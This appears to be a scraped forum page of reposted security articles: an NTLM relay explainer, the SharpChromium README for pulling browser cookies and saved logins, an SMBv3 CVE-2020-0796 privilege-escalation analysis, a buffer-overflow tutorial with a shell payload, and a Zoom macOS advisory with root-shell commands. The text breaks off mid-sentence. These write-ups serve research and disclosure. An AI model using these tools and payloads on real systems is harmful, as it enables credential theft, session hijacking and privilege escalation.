Active Directory domain, all hosts have Negotiated Signing setting. The domain controller doesn’t require signing. Settings For the domain controller, the ldapserverintegrity registry key is in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters hive and can be 0, 1 or 2 depending on the level. It is set to 1 on the domain controller by default. For the clients, this registry key is located in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ldap It is also set to 1 for clients. Since all clients and domain controllers have Negotiated Signing, all LDAP packets are signed by default. Setup Unlike SMB, there is no flag in LDAP that indicates whether packets will be signed or not. Instead, LDAP uses flags set in NTLM negotiation. There is no need for more information. In the case where both client and server support LDAP signing, then the NEGOTIATE_SIGN flag will be set and the packets will be signed. If one party requires signing, and the other party does not support it, then the session simply won’t start. The party requiring signing will ignore the unsigned packets. So now we then understand that, contrary to SMB, if we are between a client and a server and we want to relay an authentication to the server using LDAP, we need two things : The server must not require packet signing, which is the case for all machines by default The client must not set the NEGOTIATE_SIGN flag to 1. If he does, then the signature will be expected by the server, and since we don’t know the client’s secret, we won’t be able to sign our crafted LDAP packets. Regarding requirement 2, sometimes clients don’t set this flag, but unfortunately, the Windows SMB client sets it! By default, it is not possible to relay SMB authentication to LDAP. So why not just change the NEGOTIATE_FLAG flag and set it to 0? Well… NTLM messages are also signed. This is what we will see in the next paragraph. Authentication signing (MIC) We saw how a session could be protected against a middle man attacker. Now, to understand the interest of this chapter, let’s look at a specific case. Edge case Let’s imagine that an attacker manages to put himself in man-in-the-middle position between a client and a domain controller, and that he receives an authentication request via SMB. Knowing that a domain controller requires SMB signing, it is not possible for the attacker to relay this authentication via SMB. On the other hand, it is possible to change protocol, as we have seen above, and the attacker decides to relay to the LDAPS protocol, as authentication and session should be independant. Well, they are almost independent. Almost, because we saw that in the authentication data, there was the NEGOTIATE_SIGN flag which was only present to indicate whether the client and server supported signing. But in some cases, this flag is taken into account, as we saw with LDAP. Well for LDAPS, this flag is also taken into account by the server. If a server receives an authentication request with the NEGOTIATE_SIGN flag set to 1, it will reject the authentication. This is because LDAPS is LDAP over TLS, and it is TLS layer that handles packet signing (and encryption). Thus, an LDAPS client has no reason to indicate that it can sign its packets, and if it claims to be able to do so, the server laughs at it and slams the door. Now in our attack, the client we’re relaying wanted to authenticate via SMB, so yes, it supports packet signing, and yes, it sets the NEGOTIATE_SIGN flag to 1. But if we relay its authentication, without changing anything, via LDAPS, then the LDAPS server will see this flag, and will terminate the authentication phase, no question asked. We could simply modify the NTLM message and remove the flag, couldn’t we? If we could, we would, it would work well. Except that there is also a signature at NTLM level. That signature, it’s called the MIC, or Message Integrity Code. MIC - Message Integrity Code The MIC is a signature that is sent only in the last message of an NTLM authentication, the AUTHENTICATE message. It takes into account the 3 messages. The MIC is computed with HMAC_MD5 function, using as a key that depends on the client’s secret, called the session key. HMAC_MD5(Session key, NEGOTIATE_MESSAGE + CHALLENGE_MESSAGE + AUTHENTICATE_MESSAGE) What is important is that the session key depends on the client’s secret, so an attacker can’t re-calculate the MIC. Here’s an example of MIC: Therefore, if only one of the 3 messages has been modified, the MIC will no longer be valid, since the concatenation of the 3 messages will not be the same. So you can’t change the NEGOTIATE_SIGN flag, as suggested in our example. What if we just remove the MIC? Because yes, the MIC is optional. Well it won’t work, because there is another flag that indicates that a MIC will be present, msAvFlags. It is also present in NTLM response and if it is 0x00000002, it tells the server that a MIC must be present. So if the server doesn’t see the MIC, it will know that there is something going on, and it will terminate the authentication. If the flag says there must be a MIC, then there must be a MIC. All right, and if we set that msAcFlags to 0, and we remove the MIC, what happens? Since there’s no more MICs, we can’t verify that the message has been changed, can we? … Well, we can. It turns out that the NTLMv2 Hash, which is the response to the challenge sent by the server, is a hash that takes into account not only the challenge (obviously), but also all the flags of the response. As you may have guessed, the flag indicating the MIC presence is part of this response. Changing or removing this flag would make the NTLMv2 hash invalid, since the data will have been modified. Here what it looks like. The MIC protects the integrity of the 3 messages, the msAvFlags protects the presence of the MIC, and the NTLMv2 hash protects the presence of the flag. The attacker, not being aware of the user’s secret, cannot recalculate this hash. So you will have understood that, we can do nothing in this case, and that’s thanks to the MIC. Drop the MIC A little review of a recent vulnerability found by Preempt that you will easily understand now. It’s CVE-2019-1040 nicely named Drop the MIC. This vulnerability showed that if the MIC was just removed, even if the flag indicated its presence, the server accepted the authentication without flinching. This was obviously a bug that has since been fixed. It has been integrated in ntlmrelayx tool via the use of the --remove-mic parameter. Let’s take our example from earlier, but this time with a domain controller that is still vulnerable. This is what it looks like in practice. Our attack is working. Amazing. For information, another vulnerability was discovered by the very same team, and they called it Drop The MIC 2. Session key Earlier we were talking about session and authentication signing, saying that to sign something you have to know the user’s secret. We said in the chapter about MIC that in reality it’s not exactly the user’s secret that is used, but a key called session key, which depends on the user’s secret. To give you an idea, here’s how the session key is computed for NTLMv1 and NTLMv2. # For NTLMv1 Key = MD4(Hash NT) # For NTLMv2 Key = HMAC_MD5(NTLMv2 Hash, HMAC_MD5(NTLMv2 Hash, NTLMv2 Response + Challenge)) Going into the explanations would not be very useful, but there is clearly a complexity difference from one version to the other. I repeat, do not use NTLMv1 in a production network. With this information, we understand that the client can compute this key on his side, since he has all the information in hand to do so. The server, on the other hand, can’t always do it alone, like a big boy. For local authentication, there is no problem since the server knows the user’s NT hash. On the other hand, for authentication with a domain account, the server will have to ask the domain controller to compute the session key for him, and send it back. We saw in pass-the-hash article that the server sends a request to the domain controller in a NETLOGON_NETWORK_INFO structure and the domain controller responds with a NETLOGON_VALIDATION_SAM_INFO4 structure. It is in this response from the domain controller that the session key is sent, if authentication is successful. The question then arises as to what prevents an attacker from making the same request to the domain controller as the target server. Well before CVE-2015-005, nothing! What we found while implementing the NETLOGON protocol [12] is the domain controller not verifying whether the authentication information being sent, was actually meant to the domain-joined machine that is requesting this operation (e.g. NetrLogonSamLogonWithFlags()). What this means is that any domain-joined machine can verify any pass-through authentication against the domain controller, and to get the base key for cryptographic operations for any session within the domain. So obviously, Microsoft has fixed this bug. To verify that only the server the user is authenticating to has the right to ask for the session key, the domain controller will verify that the target machine in the AUTHENTICATE response is the same as the host making the NetLogon request. In the AUTHENTICATE response, we detailed the presence of msAvFlags indicating whether or not the MIC is present, but there is also other information, such as the Netbios name of the target machine. This is the name that is compared with the host making the NetLogon request. Thus, if the attacker tries to make a NetLogon request for the session key, since the attacker’s name does not match the targeted host name in NTLM response, the domain controller will reject the request. Finally, in the same way as msAvFlags, we cannot change the machine name on the fly in the NTLM response, because it is taken into account in the calculation of the NTLMv2 response. A vulnerability similar to Drop the MIC 2 has been discovered recently by Preempt security team. Here is the link to their post if you’re curious. Channel Binding We’re going to talk about one last notion. Several times we have repeated that the authentication layer, thus NTLM messages, was almost independent of the application layer, the protocol in use (SMB, LDAP, …). I say “almost” because we have seen that some protocols use some NTLM messages flags to know if the session must be signed or not. In any case, as it stands, it is quite possible for an attacker to retrieve an NTLM message from protocol A, and send it back using protocol B. This is called cross-protocol relay as we already mentioned. Well, a new protection exists to counter this attack. It’s called channel binding, or EPA (Enhanced Protection for Authentication). The principle of this protection is to bind the authentication layer with the protocol in use, even with the TLS layer when it exists (LDAPS or HTTPS for example). The general idea being that in the last NTLM AUTHENTICATE message, a piece of information is put there and cannot be modified by an attacker. This information indicates the desired service, and potentially another information that contains the target server’s certificate’s hash. We’ll look at these two principles in a little more detail, but don’t you worry, it’s relatively simple to understand. Service binding This first protection is quite simple to understand. If a client wishes to authenticate to a server to use a specific service, the information identifying the service will be added in the NTLM response. This way, when the legitimate server receives this authentication, it can see the service that was requested by the client, and if it differs from what is actually requested, it will not agree to provide the service. Since the service name is in the NTLM response, it is protected by the NtProofStr response, which is an HMAC_MD5 of this information, the challenge, and other information such as msAvFlags. It is computed with the client’s secret. In the example shown in the last diagram, we see a client trying to authenticate itself via HTTP to the server. Except that the server is an attacker, and the attacker replays this authentication to a legitimate server, to access a network share (SMB). Except that the client has indicated the service he wants to use in his NTLM response, and since the attacker cannot modify it, he has to relay it as is. The server then receives the last message, compares the service requested by the attacker (SMB) with the service specified in the NTLM message (HTTP), and refuses the connection, finding that the two services do not match. Concretely, what is called service is in fact the SPN or Service Principal Name. I dedicated a whole article to the explanation of this notion. Here is a screenshot of a client sending SPN in its NTLM response. We can see that it indicates to use the CIFS service (equivalent to SMB, just a different terminology). Relaying this to an LDAP server that takes this information into account will result in a nice Access denied from the server. But as you can see, not only there is the service name (CIFS) but there is also the target name, or IP address. It means that if an attacker relays this message to a server, the server will also check the target part, and will refuse the connexion because the IP address found in the SPN does not match his IP address. So if this protection is supported by all clients and all servers, and is required by every server, it mitigaes all relay attempts. TLS Binding This time, the purpose of this protection is to link the authentication layer, i.e. NTLM messages, to the TLS layer that can potentially be used. If the client wants to use a protocol encapsulated in TLS (HTTPS, LDAPS for example), it will establish a TLS session with the server, and it will compute the server certificate hash. This hash is called the Channel Binding Token, or CBT. Once computed, the client will put this hash in its NTLM response. The legitimate server will then receive the NTLM message at the end of the authentication, read the provided hash, and compare it with the real hash of its certificate. If it is different, it means he wasn’t the original recipient of the NTLM exchange. Again, since this hash is in the NTLM response, it is protected by the NtProofStr response, like the SPN for Service Binding. Thanks to this protection, the following two attacks are no longer possible : If an attacker wishes to relay information from a client using a protocol without a TLS layer to a protocol with a TLS layer (HTTP to LDAPS, for example), the attacker will not be able to add the certificate hash from the target server into the NTLM response, since it cannot update the NtProofStr. If an attacker wishes to relay a protocol with TLS to another protocol with TLS (HTTPS to LDAPS), when establishing the TLS session between the client and the attacker, the attacker will not be able to provide the server certificate, since it does not match the attacker’s identity. It will therefore have to provide a “homemade” certificate, identifying the attacker. The client will then hash this certificate, and when the attacker relays the NTLM response to the legitimate server, the hash in the response will not be the same as the hash of the real certificate, so the server will reject the authentication. Here is a diagram to illustrate the 2nd case. Seems complicated, but it’s not. It shows the establishment of two TLS sessions. One between the client and the attacker (in red) and one between the attacker and the server (in blue). The client will retrieve the attacker’s certificate, and calculate a hash, cert hash, in red. At the end of the NTLM exchanges, this hash will be added in the NTLM response, and will be protected since it is part of the encrypted data of the NTLM response. When the server receives this hash, it will hash his own certificate, and seeing that it is not the same result, it will refuse the connection. Again, Preempt recently found a vulnerability which has been fixed since then. What can be relayed? With all this information, you should be able to know which protocols can be relayed to which protocols. We have seen that it is impossible to relay from SMB to LDAP or LDAPS, for example. On the other hand, any client that does not set the NEGOTIATE_SIGN flag can be relayed to LDAP if the signature is not required, or LDAPS is channel binding is not required. As there are many cases, here is a table summarizing some of them. I think we can’t relay LDAPS or HTTPS since the attacker doesn’t have a valid certificate but let’s say the client is permissive and allowed untrusted certificates. Other protocols could be added, such as SQL or SMTP, but I must admit I didn’t read the documentation for all the protocols that exist. Shame on me. For gray boxes, I don’t know how an HTTPS server handles an authentication with the NEGOTIATE_SIGN flag set to 1. Stop. Using. NTLMv1. Here is a little “fun fact” that Marina Simakov suggested me to add. As we discussed, NTLMv2 hash takes into account the server’s challenge, but also the msAvFlags flag which indicates the presence of a MIC field, the field indicating the NetBios name of the target host during authentication, the SPN in case of service binding, and the certificate hash in case of TLS binding. Well NTLMv1 protocol doesn’t do that. It only takes into account the server’s challenge. In fact, there is no longer any additional information such as the target name, the msAvFlags, the SPN or the CBT. So, if an NTLMv1 authentication is allowed by a server, an attacker can simply remove the MIC and thus relay authentications to LDAP or LDAPS, for example. But more importantly, he can make NetLogon requests to retrieve the session key. Indeed, the domain controller has no way to check if he has the right to do so. And since it won’t block a production network that isn’t completely up to date, it will kindly give it to the attacker, for “retro-compatibility reasons”. Once he has the session key, he can sign any packet that he wants. It means that even if the target requests signing, he will be able to do so. This is by design and it can not be fixed. So I repeat, do not allow NTLMv1 in a production network. Conclusion Well, that’s a lot of information. We have seen here the details of NTLM relay, being aware that authentication and session that follows are two distinct notions allowing to do cross-protocol relay in many cases. Although the protocol somehow includes authentication data, it is opaque to the protocol and managed by SSPI. We have also shown how packet signing can protect the server from man-in-the-middle attacks. To do this, the target must wait for signed packet coming from the client, otherwise the attacker will be able to pretend to be someone else without having to sign the messages he sends. We saw that MIC was very important to protect NTLM exchanges, especially the flag indicating whether packets will be signed for certain protocols, or information about channel binding. We ended by showing how channel binding can link the authentication layer and the session layer, either via the service name or via a link with the server certificate. I hope this long article has given you a better understanding of what happens during an NTLM relay attack and the protections that exist. Since this article is quite substantial, it is quite likely that some mistakes have slipped in. Feel free to contact me on twitter or on my Discord Server to discuss this. Active Directory Windows Author : Pixis Blog author, follow me on twitter or discord Sursa: https://en.hackndo.com/ntlm-relay/
-
- 1
-
-
SharpChromium Introduction SharpChromium is a .NET 4.0+ CLR project to retrieve data from Google Chrome, Microsoft Edge, and Microsoft Edge Beta. Currently, it can extract: Cookies (in JSON format) History (with associated cookies for each history item) Saved Logins Note: All cookies returned are in JSON format. If you have the extension Cookie Editor installed, you can simply copy and paste into the "Import" seciton of this browser addon to ride the extracted session. Advantages This rewrite has several advantages to previous implementations, which include: No Type compilation or reflection required Cookies are displayed in JSON format, for easy importing into Cookie Editor. No downloading SQLite assemblies from remote resources. Supports major Chromium browsers (but extendable to others) Usage Usage: .\SharpChromium.exe arg0 [arg1 arg2 ...] Arguments: all - Retrieve all Chromium Cookies, History and Logins. full - The same as 'all' logins - Retrieve all saved credentials that have non-empty passwords. history - Retrieve user's history with a count of each time the URL was visited, along with cookies matching those items. cookies [domain1.com domain2.com] - Retrieve the user's cookies in JSON format. If domains are passed, then return only cookies matching those domains. Otherwise, all cookies are saved into a temp file of the format ""%TEMP%\$browser-cookies.json"" Examples Retrieve cookies associated with Google Docs and Github .\SharpChromium.exe cookies docs.google.com github.com Retrieve history items and their associated cookies. .\SharpChromium.exe history Retrieve saved logins (Note: Only displays those with non-empty passwords): .\SharpChromium.exe logins Notes on the SQLite Parser The SQLite database parser is slightly bugged. This is due to the fact that the parser correctly detects data blobs as type System.Byte[], but it does not correctly detect columns of type System.Byte[]. As a result, the byte arrays get cast to the string literal "System.Byte[]", which is wrong. I haven't gotten to the root of this cause, but as a quick and dirty workaround I have encoded all blob values as Base64 strings. Thus if you wish to retrieve a value from a column whose regular data values would be a byte array, you'll need to Base64 decode them first. Special Thanks A large thanks to @plainprogrammer for their C#-SQLite project which allowed for native parsing of the SQLite files without having to reflectively load a DLL. Without their work this project would be nowhere near as clean as it is. That project can be found here: https://github.com/plainprogrammer/csharp-sqlite Thanks to @gentlekiwi whose work on Mimikatz guided the rewrite for the decryption schema in v80+ Thanks to @harmj0y who carved out the requisite PInvoke BCrypt code so I could remove additional dependencies from this project, making it light-weight again. Sursa: https://github.com/djhohnstein/SharpChromium
-
CVE-2020-0796 Windows SMBv3 LPE Exploit POC Analysis 2020年04月02日 漏洞分析 · 404专栏 · 404 English Paper 目录 0x00 Background 0x01 Exploit principle 0x02 Get Token 0x03 Compressed Data 0x04 debugging 0x05 Elevation Author:SungLin@Knownsec 404 Team Time: April 2, 2020 Chinese version:https://paper.seebug.org/1164/ 0x00 Background On March 12, 2020, Microsoft confirmed that a critical vulnerability affecting the SMBv3 protocol exists in the latest version of Windows 10, and assigned it with CVE-2020-0796, which could allow an attacker to remotely execute the code on the SMB server or client. On March 13 they announced the poc that can cause BSOD, and on March 30, the poc that can promote local privileges was released . Here we analyze the poc that promotes local privileges. 0x01 Exploit principle The vulnerability exists in the srv2.sys driver. Because SMB does not properly handle compressed data packets, the function Srv2DecompressData is called when processing the decompressed data packets. The compressed data size of the compressed data header, OriginalCompressedSegmentSize and Offset, is not checked for legality, which results in the addition of a small amount of memory. SmbCompressionDecompress can be used later for data processing. Using this smaller piece of memory can cause copy overflow or out-of-bounds access. When executing a local program, you can obtain the current offset address of the token + 0x40 of the local program that is sent to the SMB server by compressing the data. After that, the offset address is in the kernel memory that is copied when the data is decompressed, and the token is modified in the kernel through a carefully constructed memory layout to enhance the permissions. 0x02 Get Token Let's analyze the code first. After the POC program establishes a connection with smb, it will first obtain the Token of this program by calling the function OpenProcessToken. The obtained Token offset address will be sent to the SMB server through compressed data to be modified in the kernel driver. Token is the offset address of the handle of the process in the kernel. TOKEN is a kernel memory structure used to describe the security context of the process, including process token privilege, login ID, session ID, token type, etc. Following is the Token offset address obtained by my test. 0x03 Compressed Data Next, poc will call RtCompressBuffer to compress a piece of data. By sending this compressed data to the SMB server, the SMB server will use this token offset in the kernel, and this piece of data is 'A' * 0x1108 + (ktoken + 0x40). The length of the compressed data is 0x13. After this compressed data is removed except for the header of the compressed data segment, the compressed data will be connected with two identical values 0x1FF2FF00BC, and these two values will be the key to elevation. 0x04 debugging Let's debug it first, because here is an integer overflow vulnerability. In the function srv2! Srv2DecompressData, an integer overflow will be caused by the multiplication 0xffff ffff * 0x10 = 0xf, and a smaller memory will be allocated in srvnet! SrvNetAllocateBuffer. After entering srvnet! SmbCompressionDecompress and nt! RtlDecompressBufferEx2 to continue decompression, then entering the function nt! PoSetHiberRange, and then starting the decompression operation, adding OriginalMemory = 0xffff ffff to the memory address of the UnCompressBuffer storage data allocated by the integer overflow just started Get an address far larger than the limit, it will cause copy overflow. But the size of the data we need to copy at the end is 0x1108, so there is still no overflow, because the real allocated data size is 0x1278, when entering the pool memory allocation through srvnet! SrvNetAllocateBuffer, finally enter srvnet! SrvNetAllocateBufferFromPool to call nt! ExAllocatePoolWithTag to allocate pool memory. Although the copy did not overflow, it did overwrite other variables in this memory, including the return value of srv2! Srv2DecompressDatade. The UnCompressBuffer_addressis fixed at 0x60, and the return value relative to the UnCompressBuffer_address offset is fixed at 0x1150, which means that the offset to store the address of the UnCompressBuffer relative to the return value is 0x10f0, and the address to store the offset data is 0x1168, relative to the storage decompression Data address offset is 0x1108. There is a question why it is a fixed value, because the OriginalSize = 0xffff ffff, offset = 0x10 passed in this time, the multiplication integer overflow is 0xf, and in srvnet! SrvNetAllocateBuffer, the size of the passed in 0xf is judged, which is less At 0x1100, a fixed value of 0x1100 will be passed in as the memory allocation value of the subsequent structure space for the corresponding operation, and when the value is greater than 0x1100, the size passed in will be used. Then return to the decompressed data. The size of the decompressed data is 0x13. The decompression will be performed normally. Copy 0x1108of "A", the offset address of the 8-byte token + 0x40 will be copied to the back of "A". After decompression and copying the decompressed data to the address that was initially allocated, exit the decompression function normally, and then call memcpy for the next data copy. The key point is that rcx now becomes the address of token + 0x40of the local program!!! After the decompression, the distribution of memory data is 0x1100 ('A') + Token = 0x1108, and then the function srvnet! SrvNetAllocateBuffer is called to return the memory address we need, and the address of v8 is just the initial memory offset 0x10f0, so v8 + 0x18 = 0x1108, the size of the copy is controllable, and the offset size passed in is 0x10. Finally, memcpy is called to copy the source address to the compressed data0x1FF2FF00BC to the destination address 0xffff9b893fdc46f0 (token + 0x40), the last 16 Bytes will be overwritten, the value of the token is successfully modified. 0x05 Elevation The value that is overwritten is two identical 0x1FF2FF00BC. Why use two identical values to overwrite the offset of token + 0x40? This is one of the methods for operating the token in the windows kernel to enhance the authority. Generally, there are two methods. The first method is to directly overwrite the Token. The second method is to modify the Token. Here, the Token is modified. In windbg, you can run the kd> dt _token command to view its structure. So modify the value of _SEP_TOKEN_PRIVILEGES to enable or disable it, and change the values of Present and Enabled to all privileges of the SYSTEM process token 0x1FF2FF00BC, and then set the permission to: This successfully elevated the permissions in the kernel, and then execute any code by injecting regular shellcode into the windows process "winlogon.exe": Then it performed the action of the calculator as follows: Reference link: https://github.com/eerykitty/CVE-2020-0796-PoC https://github.com/danigargu/CVE-2020-0796 https://ired.team/miscellaneous-reversing-forensics/windows-kernel/how-kernel-exploits-abuse-tokens-for-privilege-escalation 本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/1165/ Sursa: https://paper.seebug.org/1165/
-
Binary Exploitation 01 — Introduction Silaghi Fineas Mar 31 · 4 min read GREETINGS FELLOW HACKERS! It’s been a while since our last post, but this is because we’ve prepared something for you: a multi episodes Binary Exploitation Series. Without further ado, let’s get started. What is Memory Corruption? It might sound familiar, but what does it really mean? Memory Corruption is a vast area which we will explore more along this series, but for now, it is important to remember that it refers to the action of “modifying a binary’s memory in a way that was not intended”. Basically any kind of system-level exploit involves some kind of memory corruption. Let’s have a look at an example: We will consider the following program. A short program that asks for user input. If the input matches Admin’s secret Password, we will be granted Admin privileges, otherwise we will be a normal User. How can we become an Admin without knowing the Password? One solution is to brute-force the password. This approach might work for a short password, but for a 32bytes password, it’s useless. Then what can we do? Let’s play with random input values: “Welcome Admin”, what just happened? Let’s take a closer look at the memory level, using a debugger, and understand why we became Admin. We can see that the INPUT we enter will be loaded on the stack (“A stack is an area of memory for storing data temporarily”) at RBP-0x30 and the AUTH variable is located on the stack at RBP-0x4. Another aspect we can observe is that the “gets” function has no limit for the number of characters it reads. Thus, we can enter more than 32 characters. This will lead to a so called: Buffer Overflow. As we can see, our input ( ‘A’*32 + ‘a’*16) will overflow the user_input buffer and overwrite the auth variable, thus giving us Admin privileges. Think this is cool? Just wait, there’s even more. We have seen that by performing buffer overflows we can overwrite variables on the stack. But is that all we can really do? Let’s have a quick look into how functions work. Whenever a function is called, we can see that a value is pushed to the stack. That value is what we call a “return address”. After the function finishes executing, it can return to the function that called it using the “return address”. So if the return address is placed on the stack and we can perform a buffer overflow, can we overwrite it? Let’s try. Running the program with big input As we can see, the program returned a “Segmentation Fault” because, when the main function finished executing it tried to use the “return address”, but the return address was overwritten with A’s by out input. So what does this mean? This means that we can take over the execution flow by overwriting the “return address” with an address of another function. Let’s try to redirect the execution of the program to the takeover_the_world() function. The function is located at address: 0x00000000004005c7 (one way we can find this is us the command: objdump -d program_name). Putting things together we get the following input (payload): ‘A’*32 + ‘a’*16 + ‘\xc7\x05\x40\x00\x00\x00\x00\x00’ And we got a shell. Hurray! Concluding this first part, I hope I have aroused your curiosity and interest in this wonderful topic. Buffer overflows are one of the many ways memory corruption can be achieved. In the upcoming episodes we will explore more techniques and strategies. Until next time! Sursa: https://medium.com/cyber-dacians/binary-exploitation-01-introduction-9fcd2cdce9c6
-
Objective See The 'S' in Zoom, Stands for Security uncovering (local) security flaws in Zoom's latest macOS client by: Patrick Wardle / March 30, 2020 Our research, tools, and writing, are supported by the "Friends of Objective-See" such as: CleanMy Mac X Malwarebytes Airo AV Become a Friend! 📝 Update: Zoom has patched both bugs in Version 4.6.9 (19273.0402): For more details see: New Updates for macOS Background Given the current worldwide pandemic and government sanctioned lock-downs, working from home has become the norm …for now. Thanks to this, Zoom, “the leader in modern enterprise video communications” is well on it’s way to becoming a household verb, and as a result, its stock price has soared! 📈 However if you value either your (cyber) security or privacy, you may want to think twice about using (the macOS version of) the app. In this blog post, we’ll start by briefly looking at recent security and privacy flaws that affected Zoom. Following this, we’ll transition into discussing several new security issues that affect the latest version of Zoom’s macOS client. 📝 Though the new issues we'll discuss today remain unpatched, they both are local security issues. As such, to be successfully exploited they required that malware or an attacker already have a foothold on a macOS system. Though Zoom is incredibly popular it has a rather dismal security and privacy track record. In June 2019, the security researcher Jonathan Leitschuh discovered a trivially exploitable remote 0day vulnerability in the Zoom client for Mac, which “allow[ed] any malicious website to enable your camera without your permission” 😱 “This vulnerability allows any website to forcibly join a user to a Zoom call, with their video camera activated, without the user’s permission. Additionally, if you’ve ever installed the Zoom client and then uninstalled it, you still have a localhost web server on your machine that will happily re-install the Zoom client for you, without requiring any user interaction on your behalf besides visiting a webpage. This re-install ‘feature’ continues to work to this day.” -Jonathan Leitschuh 📝 Interested in more details? Read Jonathan's excellent writeup: "Zoom Zero Day: 4+ Million Webcams & maybe an RCE?". Rather hilariously Apple (forcibly!) removed the vulnerable Zoom component from user’s macs worldwide via macOS’s Malware Removal Tool (MRT😞 AFAIK, this is the only time Apple has taken this draconian action: More recently Zoom suffered a rather embarrassing privacy faux pas, when it was uncovered that their iOS application was, “send[ing] data to Facebook even if you don’t have a Facebook account” …yikes! 📝 Interested in more details? Read Motherboard's writeup: "Zoom iOS App Sends Data to Facebook Even if You Don't Have a Facebook Account". Although Zoom was quick to patch the issue (by removing the (ir)responsible code), many security researchers were quick to point out that said code should have never made it into the application in the first place: And finally today, noted macOS security researcher Felix Seele (and #OBTS v2.0 speaker!) noted that Zoom’s macOS installer (rather shadily) performs it’s “[install] job without you ever clicking install": "This is not strictly malicious but very shady and definitely leaves a bitter aftertaste. The application is installed without the user giving his final consent and a highly misleading prompt is used to gain root privileges. The same tricks that are being used by macOS malware." -Felix Seele 📝 For more details on this, see Felix's comprehensive blog post: "Good Apps Behaving Badly: Dissecting Zoom’s macOS installer workaround" The (preinstall) scripts mentioned by Felix, can be easily viewed (and extracted) from Zoom’s installer package via the Suspicious Package application: Local Zoom Security Flaw #1: Privilege Escalation to Root Zoom’s security and privacy track record leaves much to be desired. As such, today when Felix Seele also noted that the Zoom installer may invoke the AuthorizationExecuteWithPrivileges API to perform various privileged installation tasks, I decided to take a closer look. Almost immediately I uncovered several issues, including a vulnerability that leads to a trivial and reliable local privilege escalation (to root!). Stop me if you’ve heard me talk (rant) about this before, but Apple clearly notes that the AuthorizationExecuteWithPrivileges API is deprecated and should not be used. Why? Because the API does not validate the binary that will be executed (as root!) …meaning a local unprivileged attacker or piece of malware may be able to surreptitiously tamper or replace that item in order to escalate their privileges to root (as well): At DefCon 25, I presented a talk titled: “Death By 1000 Installers” that covers this in great detail: …moreover in my blog post “Sniffing Authentication References on macOS” from just last week, we covered this in great detail as well! Finally, this insecure API was (also) discussed in detail in at “Objective by the Sea” v3.0, in a talk (by Julia Vashchenko) titled: “Job(s) Bless Us! Privileged Operations on macOS": Now it should be noted that if the AuthorizationExecuteWithPrivileges API is invoked with a path to a (SIP) protected or read-only binary (or script), this issue would be thwarted (as in such a case, unprivileged code or an attacker may not be able subvert the binary/script). So the question here, in regards to Zoom is; “How are they utilizing this inherently insecure API”? Because if they are invoking it insecurely, we may have a lovely privilege escalation vulnerability! As discussed in my DefCon presentation, the easiest way is answer this question is simply to run a process monitor, execute the installer package (or whatever invokes the AuthorizationExecuteWithPrivileges API) and observe the arguments that are passed to the security_authtrampoline (the setuid system binary that ultimately performs the privileged action): The image above illustrates the flow of control initiated by the AuthorizationExecuteWithPrivileges API and shows how the item (binary, script, command, etc) to is to be executed with root privileges is passed as the first parameter to security_authtrampoline process. If this parameter, this item, is editable (i.e. can be maliciously subverted) by an unprivileged attacker then that’s a clear security issue! Let’s figure out what Zoom is executing via AuthorizationExecuteWithPrivileges! First we download the latest version of Zoom’s installer for macOS (Version 4.6.8 (19178.0323)) from https://zoom.us/download: Then, we fire up our macOS Process Monitor (https://objective-see.com/products/utilities.html#ProcessMonitor), and launch the Zoom installer package (Zoom.pkg). If the user installing Zoom is running as a ‘standard’ (read: non-admin) user, the installer may prompt for administrator credentials: …as expected our process monitor will observe the launching (ES_EVENT_TYPE_NOTIFY_EXEC) of /usr/libexec/security_authtrampoline to handle the authorization request: # ProcessMonitor.app/Contents/MacOS/ProcessMonitor -pretty { "event" : "ES_EVENT_TYPE_NOTIFY_EXEC", "process" : { "uid" : 0, "arguments" : [ "/usr/libexec/security_authtrampoline", "./runwithroot", "auth 3", "/Users/tester/Applications/zoom.us.app", "/Applications/zoom.us.app" ], "ppid" : 1876, "ancestors" : [ 1876, 1823, 1820, 1 ], "signing info" : { "csFlags" : 603996161, "signatureIdentifier" : "com.apple.security_authtrampoline", "cdHash" : "DC98AF22E29CEC96BB89451933097EAF9E01242", "isPlatformBinary" : 1 }, "path" : "/usr/libexec/security_authtrampoline", "pid" : 1882 }, "timestamp" : "2020-03-31 03:18:45 +0000" } And what is Zoom attempting to execute as root (i.e. what is passed to security_authtrampoline?) …a bash script named runwithroot. If the user provides the requested credentials to complete the install, the runwithroot script will be executed as root (note: uid: 0😞 { "event" : "ES_EVENT_TYPE_NOTIFY_EXEC", "process" : { "uid" : 0, "arguments" : [ "/bin/sh", "./runwithroot", "/Users/tester/Applications/zoom.us.app", "/Applications/zoom.us.app" ], "ppid" : 1876, "ancestors" : [ 1876, 1823, 1820, 1 ], "signing info" : { "csFlags" : 603996161, "signatureIdentifier" : "com.apple.sh", "cdHash" : "D3308664AA7E12DF271DC78A7AE61F27ADA63BD6", "isPlatformBinary" : 1 }, "path" : "/bin/sh", "pid" : 1882 }, "timestamp" : "2020-03-31 03:18:45 +0000" } The contents of runwithroot are irrelevant. All that matters is, can a local, unprivileged attacker (or piece of malware) subvert the script prior its execution as root? (As again, recall the AuthorizationExecuteWithPrivileges API does not validate what is being executed). Since it’s Zoom we’re talking about, the answer is of course yes! 😅 We can confirm this by noting that during the installation process, the macOS Installer (which handles installations of .pkgs) copies the runwithroot script to a user-writable temporary directory: tester@users-Mac T % pwd /private/var/folders/v5/s530008n11dbm2n2pgzxkk700000gp/T tester@users-Mac T % ls -lart com.apple.install.v43Mcm4r total 27224 -rwxr-xr-x 1 tester staff 70896 Mar 23 02:25 zoomAutenticationTool -rw-r--r-- 1 tester staff 513 Mar 23 02:25 zoom.entitlements -rw-r--r-- 1 tester staff 12008512 Mar 23 02:25 zm.7z -rwxr-xr-x 1 tester staff 448 Mar 23 02:25 runwithroot ... Lovely - it looks like we’re in business and may be able to gain root privileges! Exploitation of these types of bugs is trivial and reliable (though requires some patience …as you have to wait for the installer or updater to run!) as is show in the following diagram: To exploit Zoom, a local non-privileged attacker can simply replace or subvert the runwithroot script during an install (or upgrade?) to gain root access. For example to pop a root shell, simply add the following commands to the runwithroot script: 1cp /bin/ksh /tmp 2chown root:wheel /tmp/ksh 3chmod u+s /tmp/ksh 4open /tmp/ksh Le boom 💥: Local Zoom Security Flaw #2: Code Injection for Mic & Camera Access In order for Zoom to be useful it requires access to the system’s mic and camera. On recent versions of macOS, this requires explicit user approval (which, from a security and privacy point of view is a good thing): Unfortunately, Zoom has (for reasons unbeknown to me), a specific “exclusion” that allows malicious code to be injected into its process space, where said code can piggy-back off Zoom’s (mic and camera) access! This give malicious code a way to either record 